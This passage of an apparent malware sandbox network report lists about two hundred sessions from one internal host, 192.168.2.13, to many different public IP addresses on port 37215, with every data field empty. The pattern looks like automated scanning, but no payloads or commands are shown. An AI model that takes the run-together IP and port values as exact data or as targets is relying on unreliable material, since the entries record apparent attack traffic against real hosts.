                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2806192.168.2.1359440157.209.190.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2807192.168.2.1356708157.72.76.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2808192.168.2.1335534159.123.255.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2809192.168.2.134959441.61.35.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2810192.168.2.1348994197.59.200.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2811192.168.2.1333186101.250.179.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2812192.168.2.1342540148.243.106.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2813192.168.2.135028441.210.241.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2814192.168.2.134942013.143.126.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2815192.168.2.1339040157.237.199.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2816192.168.2.1346456157.58.25.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2817192.168.2.1343734152.199.25.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2818192.168.2.133418641.24.144.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2819192.168.2.1336044124.173.198.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2820192.168.2.1334568196.234.9.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2821192.168.2.1358856197.184.128.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2822192.168.2.1338496164.219.19.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2823192.168.2.135050241.85.223.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2824192.168.2.134566241.77.127.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2825192.168.2.1347070157.227.52.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2826192.168.2.1337714104.97.248.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2827192.168.2.1360066195.22.81.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2828192.168.2.134032294.44.187.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2829192.168.2.135179241.9.102.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2830192.168.2.1336242197.28.169.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2831192.168.2.1345800157.152.4.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2832192.168.2.135098661.58.102.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2833192.168.2.1354796116.53.132.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2834192.168.2.1341260197.65.178.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2835192.168.2.1337502197.73.15.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2836192.168.2.1358418157.236.104.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2837192.168.2.1359526170.208.198.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2838192.168.2.133548841.215.58.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2839192.168.2.134453041.198.50.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2840192.168.2.1352702180.103.107.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2841192.168.2.1353238157.92.86.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2842192.168.2.1332926197.32.173.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2843192.168.2.1337316197.126.106.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2844192.168.2.1343714179.186.208.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2845192.168.2.1350500157.32.219.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2846192.168.2.135653261.207.218.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2847192.168.2.1339718157.25.96.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2848192.168.2.1333046176.235.154.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2849192.168.2.1334020157.169.162.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2850192.168.2.1342984197.99.128.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2851192.168.2.135547641.127.232.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2852192.168.2.1356802197.163.204.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2853192.168.2.1334458197.46.251.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2854192.168.2.1350092157.80.39.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2855192.168.2.1356906157.182.111.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2856192.168.2.1359784197.34.76.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2857192.168.2.135654041.214.23.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2858192.168.2.1345688157.151.239.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2859192.168.2.1336372157.29.219.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2860192.168.2.1344930197.111.249.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2861192.168.2.1350312197.217.49.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2862192.168.2.1341744213.38.177.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2863192.168.2.1350314157.185.214.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2864192.168.2.1356874157.185.23.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2865192.168.2.1352622197.64.66.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2866192.168.2.133898861.52.113.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2867192.168.2.133534641.96.199.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2868192.168.2.1341178156.176.117.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2869192.168.2.1346258197.174.53.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2870192.168.2.1354326197.163.144.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2871192.168.2.1337058157.241.72.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2872192.168.2.134661841.92.54.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2873192.168.2.136097841.53.21.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2874192.168.2.136039425.165.142.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2875192.168.2.1338876157.235.187.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2876192.168.2.1343758157.125.239.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2877192.168.2.1348654197.224.77.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2878192.168.2.1350974157.84.28.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2879192.168.2.1354526197.35.131.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2880192.168.2.1336694197.241.203.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2881192.168.2.1359042115.243.238.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2882192.168.2.135325641.229.187.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2883192.168.2.1343804197.164.98.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2884192.168.2.134288065.141.141.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2885192.168.2.1347516197.118.189.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2886192.168.2.134887841.255.107.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2887192.168.2.1343934197.34.9.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2888192.168.2.1349766197.242.194.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2889192.168.2.1355848157.205.16.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2890192.168.2.1351852117.93.126.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2891192.168.2.1350882157.98.1.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2892192.168.2.1340436197.149.94.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2893192.168.2.1357682190.246.220.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2894192.168.2.135848041.212.197.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2895192.168.2.1339576197.180.182.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2896192.168.2.133523441.54.26.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2897192.168.2.1353040132.68.241.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2898192.168.2.1345340212.120.121.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2899192.168.2.1349880197.77.132.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2900192.168.2.135958441.66.26.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2901192.168.2.133314062.180.13.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2902192.168.2.1345378103.202.0.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2903192.168.2.135443875.211.105.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2904192.168.2.135338047.147.46.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2905192.168.2.1334838197.176.16.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2906192.168.2.1356092157.7.28.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2907192.168.2.134134841.80.206.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2908192.168.2.1360002197.12.190.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2909192.168.2.1345452197.178.215.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2910192.168.2.1351746157.24.4.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2911192.168.2.1338846197.14.157.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2912192.168.2.134566641.87.83.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2913192.168.2.1348386157.56.105.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2914192.168.2.1351664128.231.76.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2915192.168.2.1353018157.140.201.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2916192.168.2.1350064197.244.196.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2917192.168.2.1357100157.131.135.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2918192.168.2.134700646.6.27.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2919192.168.2.135118441.210.25.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2920192.168.2.1347338197.172.63.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2921192.168.2.135970241.43.13.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2922192.168.2.1334034157.146.182.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2923192.168.2.1345986197.54.246.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2924192.168.2.133986041.66.196.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2925192.168.2.1345762197.132.175.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2926192.168.2.134536644.162.124.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2927192.168.2.135222641.180.158.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2928192.168.2.1351108197.162.192.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2929192.168.2.135438041.31.50.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2930192.168.2.1333914197.24.152.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2931192.168.2.1358366157.205.149.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2932192.168.2.135845097.23.233.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2933192.168.2.1360470197.51.171.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2934192.168.2.135513824.242.135.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2935192.168.2.135794241.246.62.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2936192.168.2.1357918157.20.21.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2937192.168.2.1359914205.26.231.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2938192.168.2.1353678157.188.49.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2939192.168.2.1333408197.64.186.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2940192.168.2.1336848197.23.45.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2941192.168.2.1344786197.114.69.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2942192.168.2.135248241.74.64.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2943192.168.2.134294841.69.76.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2944192.168.2.1354028189.76.104.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2945192.168.2.1335844186.209.205.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2946192.168.2.1354502157.189.230.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2947192.168.2.133484241.12.200.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2948192.168.2.1352682157.166.6.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2949192.168.2.1339876173.48.229.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2950192.168.2.133470641.169.62.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2951192.168.2.1355104197.54.210.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2952192.168.2.1354176178.152.195.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2953192.168.2.134618095.40.116.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2954192.168.2.135410641.156.250.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2955192.168.2.1342096197.159.125.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2956192.168.2.1359960197.135.204.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2957192.168.2.133926841.168.40.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2958192.168.2.134076441.14.212.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2959192.168.2.134883841.135.93.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2960192.168.2.133653841.142.212.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2961192.168.2.1359770197.244.238.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2962192.168.2.1351974193.71.98.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2963192.168.2.133674679.251.255.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2964192.168.2.134297641.156.103.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2965192.168.2.135345099.201.57.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2966192.168.2.1352618158.205.31.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2967192.168.2.1349088130.99.50.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2968192.168.2.134236041.116.18.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2969192.168.2.135733687.217.59.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2970192.168.2.1343298197.52.82.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2971192.168.2.1359854197.51.228.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2972192.168.2.134534441.16.183.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2973192.168.2.1353478157.47.138.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2974192.168.2.1357088197.19.227.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2975192.168.2.1339492197.33.210.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2976192.168.2.134558241.156.12.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2977192.168.2.1354252132.175.63.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2978192.168.2.1336266157.168.159.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2979192.168.2.1352724134.56.164.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2980192.168.2.134115441.35.40.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2981192.168.2.1342996197.13.26.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2982192.168.2.1333314178.188.242.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2983192.168.2.134291696.183.64.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2984192.168.2.134715620.47.240.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2985192.168.2.1357632197.238.222.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2986192.168.2.1338414157.227.18.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2987192.168.2.1342108197.169.23.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2988192.168.2.134538041.25.1.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2989192.168.2.133405841.248.174.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2990192.168.2.133965041.212.223.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2991192.168.2.1352438157.230.54.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2992192.168.2.1339526157.63.148.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2993192.168.2.1347904134.102.231.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2994192.168.2.1338780157.209.77.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2995192.168.2.13352502.171.158.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2996192.168.2.1336536197.196.106.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2997192.168.2.1359964197.102.121.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2998192.168.2.1346370197.246.183.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2999192.168.2.1338556157.215.24.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3000192.168.2.134423241.135.111.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3001192.168.2.133487495.19.12.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3002192.168.2.1344356157.163.0.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3003192.168.2.1348594197.59.89.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3004192.168.2.1346792197.104.113.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3005192.168.2.1338328210.6.142.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3006192.168.2.135659241.155.141.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3007192.168.2.1344636122.37.95.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3008192.168.2.1337118157.185.102.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3009192.168.2.1359460138.215.203.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3010192.168.2.1346578197.226.63.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3011192.168.2.1343454197.54.45.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3012192.168.2.1355622220.73.76.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3013192.168.2.134830041.87.56.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3014192.168.2.1333856197.90.99.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
